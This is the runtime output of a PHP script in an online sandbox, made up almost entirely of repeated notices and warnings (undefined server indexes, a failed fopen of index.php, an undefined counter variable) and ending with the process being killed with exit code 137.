Notice: Undefined index: HTTP_HOST in /in/q7qZT on line 3 Notice: Undefined index: REQUEST_URI in /in/q7qZT on line 3 Warning: fopen(index.php): failed to open stream: Permission denied in /in/q7qZT on line 10 Warning: fwrite() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 11 Warning: fclose() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 12 Warning: fopen(index.php): failed to open stream: Permission denied in /in/q7qZT on line 10 Warning: fwrite() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 11 Warning: fclose() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 12 Warning: fopen(index.php): failed to open stream: Permission denied in /in/q7qZT on line 10 Warning: fwrite() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 11 Warning: fclose() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 12 Notice: Undefined variable: counter in /in/q7qZT on line 56 Warning: fopen(index.php): failed to open stream: Permission denied in /in/q7qZT on line 10 Warning: fwrite() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 11 Warning: fclose() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 12 Notice: Undefined variable: counter in /in/q7qZT on line 56 Warning: fopen(index.php): failed to open stream: Permission denied in /in/q7qZT on line 10 Warning: fwrite() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 11 Warning: fclose() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 12 Notice: Undefined variable: counter in /in/q7qZT on line 56 Warning: fopen(index.php): failed to open stream: Permission denied in /in/q7qZT on line 10 Warning: fwrite() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 11 Warning: fclose() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 12 Warning: fopen(index.php): failed to open stream: Permission denied in /in/q7qZT on line 10 Warning: fwrite() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 11 Warning: fclose() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 12 Notice: Undefined variable: counter in /in/q7qZT on line 56 Notice: Undefined variable: counter in /in/q7qZT on line 56 Warning: fopen(index.php): failed to open stream: Permission denied in /in/q7qZT on line 10 Warning: fwrite() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 11 Warning: fclose() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 12 Notice: Undefined variable: counter in /in/q7qZT on line 56 Warning: fopen(index.php): failed to open stream: Permission denied in /in/q7qZT on line 10 Warning: fwrite() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 11 Warning: fclose() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 12 Notice: Undefined variable: counter in /in/q7qZT on line 56 Warning: fopen(index.php): failed to open stream: Permission denied in /in/q7qZT on line 10 Warning: fwrite() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 11 Warning: fclose() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 12 Notice: Undefined variable: counter in /in/q7qZT on line 56 Warning: fopen(index.php): failed to open stream: Permission denied in /in/q7qZT on line 10 Warning: fwrite() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 11 Warning: fclose() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 12 Notice: Undefined variable: counter in /in/q7qZT on line 56 Warning: fopen(index.php): failed to open stream: Permission denied in /in/q7qZT on line 10 Warning: fwrite() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 11 Warning: fclose() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 12 Warning: fopen(index.php): failed to open stream: Permission denied in /in/q7qZT on line 10 Warning: fwrite() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 11 Warning: fclose() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 12 Notice: Undefined variable: counter in /in/q7qZT on line 56 Warning: fopen(index.php): failed to open stream: Permission denied in /in/q7qZT on line 10 Warning: fwrite() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 11 Warning: fclose() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 12 Notice: Undefined variable: counter in /in/q7qZT on line 56 Notice: Undefined variable: counter in /in/q7qZT on line 56 Warning: fopen(index.php): failed to open stream: Permission denied in /in/q7qZT on line 10 Warning: fwrite() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 11 Warning: fclose() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 12 Notice: Undefined variable: counter in /in/q7qZT on line 56 Warning: fopen(index.php): failed to open stream: Permission denied in /in/q7qZT on line 10 Warning: fwrite() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 11 Warning: fclose() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 12 Warning: fopen(index.php): failed to open stream: Permission denied in /in/q7qZT on line 10 Warning: fwrite() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 11 Warning: fclose() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 12 Notice: Undefined variable: counter in /in/q7qZT on line 56 Warning: fopen(index.php): failed to open stream: Permission denied in /in/q7qZT on line 10 Warning: fwrite() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 11 Warning: fclose() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 12 Notice: Undefined variable: counter in /in/q7qZT on line 56 Warning: fopen(index.php): failed to open stream: Permission denied in /in/q7qZT on line 10 Warning: fwrite() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 11 Warning: fclose() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 12 Notice: Undefined variable: counter in /in/q7qZT on line 56 Warning: fopen(index.php): failed to open stream: Permission denied in /in/q7qZT on line 10 Warning: fwrite() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 11 Warning: fclose() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 12 Notice: Undefined variable: counter in /in/q7qZT on line 56 Warning: fopen(index.php): failed to open stream: Permission denied in /in/q7qZT on line 10 Warning: fwrite() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 11 Warning: fclose() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 12 Notice: Undefined variable: counter in /in/q7qZT on line 56 Warning: fopen(index.php): failed to open stream: Permission denied in /in/q7qZT on line 10 Warning: fwrite() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 11 Warning: fclose() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 12 Notice: Undefined variable: counter in /in/q7qZT on line 56 Warning: fopen(index.php): failed to open stream: Permission denied in /in/q7qZT on line 10 Warning: fwrite() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 11 Warning: fclose() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 12 Notice: Undefined variable: counter in /in/q7qZT on line 56 Warning: fopen(index.php): failed to open stream: Permission denied in /in/q7qZT on line 10 Warning: fwrite() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 11 Warning: fclose() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 12 Notice: Undefined variable: counter in /in/q7qZT on line 56 Warning: fopen(index.php): failed to open stream: Permission denied in /in/q7qZT on line 10 Warning: fwrite() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 11 Warning: fclose() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 12 Notice: Undefined variable: counter in /in/q7qZT on line 56 Warning: fopen(index.php): failed to open stream: Permission denied in /in/q7qZT on line 10 Warning: fwrite() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 11 Warning: fclose() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 12 Notice: Undefined variable: counter in /in/q7qZT on line 56 Warning: fopen(index.php): failed to open stream: Permission denied in /in/q7qZT on line 10 Warning: fwrite() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 11 Warning: fclose() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 12 Notice: Undefined variable: counter in /in/q7qZT on line 56 Warning: fopen(index.php): failed to open stream: Permission denied in /in/q7qZT on line 10 Warning: fwrite() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 11 Warning: fclose() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 12 Notice: Undefined variable: counter in /in/q7qZT on line 56 Warning: fopen(index.php): failed to open stream: Permission denied in /in/q7qZT on line 10 Warning: fwrite() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 11 Warning: fclose() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 12 Notice: Undefined variable: counter in /in/q7qZT on line 56 Warning: fopen(index.php): failed to open stream: Permission denied in /in/q7qZT on line 10 Warning: fwrite() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 11 Warning: fclose() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 12 Notice: Undefined variable: counter in /in/q7qZT on line 56 Warning: fopen(index.php): failed to open stream: Permission denied in /in/q7qZT on line 10 Warning: fwrite() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 11 Warning: fclose() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 12 Notice: Undefined variable: counter in /in/q7qZT on line 56 Warning: fopen(index.php): failed to open stream: Permission denied in /in/q7qZT on line 10 Warning: fwrite() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 11 Warning: fclose() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 12 Notice: Undefined variable: counter in /in/q7qZT on line 56 Warning: fopen(index.php): failed to open stream: Permission denied in /in/q7qZT on line 10 Warning: fwrite() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 11 Warning: fclose() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 12 Notice: Undefined variable: counter in /in/q7qZT on line 56 Warning: fopen(index.php): failed to open stream: Permission denied in /in/q7qZT on line 10 Warning: fwrite() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 11 Warning: fclose() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 12 Notice: Undefined variable: counter in /in/q7qZT on line 56 Warning: fopen(index.php): failed to open stream: Permission denied in /in/q7qZT on line 10 Warning: fwrite() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 11 Warning: fclose() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 12 Notice: Undefined variable: counter in /in/q7qZT on line 56 Warning: fopen(index.php): failed to open stream: Permission denied in /in/q7qZT on line 10 Warning: fwrite() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 11 Warning: fclose() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 12 Notice: Undefined variable: counter in /in/q7qZT on line 56 Warning: fopen(index.php): failed to open stream: Permission denied in /in/q7qZT on line 10 Warning: fwrite() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 11 Warning: fclose() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 12 Notice: Undefined variable: counter in /in/q7qZT on line 56 Warning: fopen(index.php): failed to open stream: Permission denied in /in/q7qZT on line 10 Warning: fwrite() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 11 Warning: fclose() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 12 Notice: Undefined variable: counter in /in/q7qZT on line 56 Warning: fopen(index.php): failed to open stream: Permission denied in /in/q7qZT on line 10 Warning: fwrite() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 11 Warning: fclose() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 12 Notice: Undefined variable: counter in /in/q7qZT on line 56 Warning: fopen(index.php): failed to open stream: Permission denied in /in/q7qZT on line 10 Warning: fwrite() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 11 Warning: fclose() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 12 Notice: Undefined variable: counter in /in/q7qZT on line 56 Warning: fopen(index.php): failed to open stream: Permission denied in /in/q7qZT on line 10 Warning: fwrite() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 11 Warning: fclose() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 12 Notice: Undefined variable: counter in /in/q7qZT on line 56 Warning: fopen(index.php): failed to open stream: Permission denied in /in/q7qZT on line 10 Warning: fwrite() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 11 Warning: fclose() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 12 Notice: Undefined variable: counter in /in/q7qZT on line 56 Warning: fopen(index.php): failed to open stream: Permission denied in /in/q7qZT on line 10 Warning: fwrite() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 11 Warning: fclose() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 12 Notice: Undefined variable: counter in /in/q7qZT on line 56 Warning: fopen(index.php): failed to open stream: Permission denied in /in/q7qZT on line 10 Warning: fwrite() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 11 Warning: fclose() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 12 Notice: Undefined variable: counter in /in/q7qZT on line 56 Warning: fopen(index.php): failed to open stream: Permission denied in /in/q7qZT on line 10 Warning: fwrite() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 11 Warning: fclose() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 12 Notice: Undefined variable: counter in /in/q7qZT on line 56 Warning: fopen(index.php): failed to open stream: Permission denied in /in/q7qZT on line 10 Warning: fwrite() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 11 Warning: fclose() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 12 Notice: Undefined variable: counter in /in/q7qZT on line 56 Warning: fopen(index.php): failed to open stream: Permission denied in /in/q7qZT on line 10 Warning: fwrite() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 11 Warning: fclose() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 12 Notice: Undefined variable: counter in /in/q7qZT on line 56 Warning: fopen(index.php): failed to open stream: Permission denied in /in/q7qZT on line 10 Warning: fwrite() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 11 Warning: fclose() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 12 Notice: Undefined variable: counter in /in/q7qZT on line 56 Warning: fopen(index.php): failed to open stream: Permission denied in /in/q7qZT on line 10 Warning: fwrite() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 11 Warning: fclose() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 12 Notice: Undefined variable: counter in /in/q7qZT on line 56 Warning: fopen(index.php): failed to open stream: Permission denied in /in/q7qZT on line 10 Warning: fwrite() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 11 Warning: fclose() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 12 Notice: Undefined variable: counter in /in/q7qZT on line 56 Warning: fopen(index.php): failed to open stream: Permission denied in /in/q7qZT on line 10 Warning: fwrite() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 11 Warning: fclose() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 12 Notice: Undefined variable: counter in /in/q7qZT on line 56 Warning: fopen(index.php): failed to open stream: Permission denied in /in/q7qZT on line 10 Warning: fwrite() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 11 Warning: fclose() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 12 Notice: Undefined variable: counter in /in/q7qZT on line 56 Warning: fopen(index.php): failed to open stream: Permission denied in /in/q7qZT on line 10 Warning: fwrite() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 11 Warning: fclose() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 12 Notice: Undefined variable: counter in /in/q7qZT on line 56 Warning: fopen(index.php): failed to open stream: Permission denied in /in/q7qZT on line 10 Warning: fwrite() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 11 Warning: fclose() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 12 Notice: Undefined variable: counter in /in/q7qZT on line 56 Warning: fopen(index.php): failed to open stream: Permission denied in /in/q7qZT on line 10 Warning: fwrite() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 11 Warning: fclose() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 12 Notice: Undefined variable: counter in /in/q7qZT on line 56 Warning: fopen(index.php): failed to open stream: Permission denied in /in/q7qZT on line 10 Warning: fwrite() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 11 Warning: fclose() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 12 Notice: Undefined variable: counter in /in/q7qZT on line 56 Warning: fopen(index.php): failed to open stream: Permission denied in /in/q7qZT on line 10 Warning: fwrite() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 11 Warning: fclose() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 12 Notice: Undefined variable: counter in /in/q7qZT on line 56 Warning: fopen(index.php): failed to open stream: Permission denied in /in/q7qZT on line 10 Warning: fwrite() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 11 Warning: fclose() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 12 Notice: Undefined variable: counter in /in/q7qZT on line 56 Notice: Undefined variable: counter in /in/q7qZT on line 56 Warning: fopen(index.php): failed to open stream: Permission denied in /in/q7qZT on line 10 Warning: fwrite() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 11 Warning: fclose() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 12 Notice: Undefined variable: counter in /in/q7qZT on line 56 Warning: fopen(index.php): failed to open stream: Permission denied in /in/q7qZT on line 10 Warning: fwrite() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 11 Warning: fclose() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 12 Warning: fopen(index.php): failed to open stream: Permission denied in /in/q7qZT on line 10 Warning: fwrite() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 11 Warning: fclose() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 12 Warning: fopen(index.php): failed to open stream: Permission denied in /in/q7qZT on line 10 Warning: fwrite() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 11 Warning: fclose() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 12 Warning: fopen(index.php): failed to open stream: Permission denied in /in/q7qZT on line 10 Warning: fwrite() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 11 Warning: fclose() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 12 Warning: fopen(index.php): failed to open stream: Permission denied in /in/q7qZT on line 10 Warning: fwrite() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 11 Warning: fclose() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 12 Warning: fopen(index.php): failed to open stream: Permission denied in /in/q7qZT on line 10 Warning: fwrite() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 11 Warning: fclose() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 12 Notice: Undefined variable: counter in /in/q7qZT on line 56 Notice: Undefined variable: counter in /in/q7qZT on line 56 Notice: Undefined variable: counter in /in/q7qZT on line 56 Notice: Undefined variable: counter in /in/q7qZT on line 56 Warning: fopen(index.php): failed to open stream: Permission denied in /in/q7qZT on line 10 Warning: fwrite() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 11 Warning: fclose() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 12 Warning: fopen(index.php): failed to open stream: Permission denied in /in/q7qZT on line 10 Warning: fwrite() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 11 Warning: fclose() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 12 Notice: Undefined variable: counter in /in/q7qZT on line 56 Notice: Undefined variable: counter in /in/q7qZT on line 56 Notice: Undefined variable: counter in /in/q7qZT on line 56 Notice: Undefined variable: counter in /in/q7qZT on line 56 Warning: fopen(index.php): failed to open stream: Permission denied in /in/q7qZT on line 10 Warning: fwrite() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 11 Warning: fclose() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 12 Notice: Undefined variable: counter in /in/q7qZT on line 56 Warning: fopen(index.php): failed to open stream: Permission denied in /in/q7qZT on line 10 Warning: fwrite() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 11 Warning: fclose() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 12 Notice: Undefined variable: counter in /in/q7qZT on line 56 Warning: fopen(index.php): failed to open stream: Permission denied in /in/q7qZT on line 10 Warning: fwrite() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 11 Warning: fclose() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 12 Notice: Undefined variable: counter in /in/q7qZT on line 56 Warning: fopen(index.php): failed to open stream: Permission denied in /in/q7qZT on line 10 Warning: fwrite() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 11 Warning: fclose() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 12 Warning: fopen(index.php): failed to open stream: Permission denied in /in/q7qZT on line 10 Warning: fwrite() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 11 Warning: fclose() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 12 Notice: Undefined variable: counter in /in/q7qZT on line 56 Warning: fopen(index.php): failed to open stream: Permission denied in /in/q7qZT on line 10 Warning: fwrite() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 11 Warning: fclose() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 12 Notice: Undefined variable: counter in /in/q7qZT on line 56 Notice: Undefined variable: counter in /in/q7qZT on line 56 Warning: fopen(index.php): failed to open stream: Permission denied in /in/q7qZT on line 10 Warning: fwrite() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 11 Warning: fclose() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 12 Warning: fopen(index.php): failed to open stream: Permission denied in /in/q7qZT on line 10 Warning: fwrite() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 11 Warning: fclose() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 12 Warning: fopen(index.php): failed to open stream: Permission denied in /in/q7qZT on line 10 Warning: fwrite() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 11 Warning: fclose() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 12 Notice: Undefined variable: counter in /in/q7qZT on line 56 Warning: fopen(index.php): failed to open stream: Permission denied in /in/q7qZT on line 10 Warning: fwrite() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 11 Warning: fclose() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 12 Notice: Undefined variable: counter in /in/q7qZT on line 56 Notice: Undefined variable: counter in /in/q7qZT on line 56 Notice: Undefined variable: counter in /in/q7qZT on line 56 Warning: fopen(index.php): failed to open stream: Permission denied in /in/q7qZT on line 10 Warning: fwrite() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 11 Warning: fclose() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 12 Warning: fopen(index.php): failed to open stream: Permission denied in /in/q7qZT on line 10 Warning: fwrite() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 11 Warning: fclose() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 12 Warning: fopen(index.php): failed to open stream: Permission denied in /in/q7qZT on line 10 Warning: fwrite() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 11 Warning: fclose() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 12 Warning: fopen(index.php): failed to open stream: Permission denied in /in/q7qZT on line 10 Warning: fwrite() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 11 Warning: fclose() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 12 Notice: Undefined variable: counter in /in/q7qZT on line 56 Notice: Undefined variable: counter in /in/q7qZT on line 56 Notice: Undefined variable: counter in /in/q7qZT on line 56 Notice: Undefined variable: counter in /in/q7qZT on line 56 Warning: fopen(index.php): failed to open stream: Permission denied in /in/q7qZT on line 10 Warning: fwrite() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 11 Warning: fclose() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 12 Notice: Undefined variable: counter in /in/q7qZT on line 56 Warning: fopen(index.php): failed to open stream: Permission denied in /in/q7qZT on line 10 Warning: fwrite() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 11 Warning: fclose() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 12 Warning: fopen(index.php): failed to open stream: Permission denied in /in/q7qZT on line 10 Warning: fwrite() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 11 Warning: fclose() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 12 Notice: Undefined variable: counter in /in/q7qZT on line 56 Notice: Undefined variable: counter in /in/q7qZT on line 56 Warning: fopen(index.php): failed to open stream: Permission denied in /in/q7qZT on line 10 Warning: fwrite() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 11 Warning: fclose() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 12 Notice: Undefined variable: counter in /in/q7qZT on line 56 Warning: fopen(index.php): failed to open stream: Permission denied in /in/q7qZT on line 10 Warning: fwrite() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 11 Warning: fclose() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 12 Notice: Undefined variable: counter in /in/q7qZT on line 56 Warning: fopen(index.php): failed to open stream: Permission denied in /in/q7qZT on line 10 Warning: fwrite() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 11 Warning: fclose() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 12 Notice: Undefined variable: counter in /in/q7qZT on line 56 Warning: fopen(index.php): failed to open stream: Permission denied in /in/q7qZT on line 10 Warning: fwrite() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 11 Warning: fclose() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 12 Warning: fopen(index.php): failed to open stream: Permission denied in /in/q7qZT on line 10 Warning: fwrite() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 11 Warning: fclose() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 12 Notice: Undefined variable: counter in /in/q7qZT on line 56 Notice: Undefined variable: counter in /in/q7qZT on line 56 Warning: fopen(index.php): failed to open stream: Permission denied in /in/q7qZT on line 10 Warning: fwrite() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 11 Warning: fclose() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 12 Warning: fopen(index.php): failed to open stream: Permission denied in /in/q7qZT on line 10 Warning: fwrite() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 11 Warning: fclose() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 12 Notice: Undefined variable: counter in /in/q7qZT on line 56 Warning: fopen(index.php): failed to open stream: Permission denied in /in/q7qZT on line 10 Warning: fwrite() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 11 Warning: fclose() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 12 Warning: fopen(index.php): failed to open stream: Permission denied in /in/q7qZT on line 10 Warning: fwrite() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 11 Warning: fclose() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 12 Notice: Undefined variable: counter in /in/q7qZT on line 56 Warning: fopen(index.php): failed to open stream: Permission denied in /in/q7qZT on line 10 Warning: fwrite() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 11 Warning: fclose() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 12 Notice: Undefined variable: counter in /in/q7qZT on line 56 Notice: Undefined variable: counter in /in/q7qZT on line 56 Notice: Undefined variable: counter in /in/q7qZT on line 56 Warning: fopen(index.php): failed to open stream: Permission denied in /in/q7qZT on line 10 Warning: fwrite() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 11 Warning: fclose() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 12 Warning: fopen(index.php): failed to open stream: Permission denied in /in/q7qZT on line 10 Warning: fwrite() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 11 Warning: fclose() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 12 Notice: Undefined variable: counter in /in/q7qZT on line 56 Notice: Undefined variable: counter in /in/q7qZT on line 56 Warning: fopen(index.php): failed to open stream: Permission denied in /in/q7qZT on line 10 Warning: fwrite() expects parameter
Process exited with code 137.

preferences:
339.97 ms | 437 KiB | 271 Q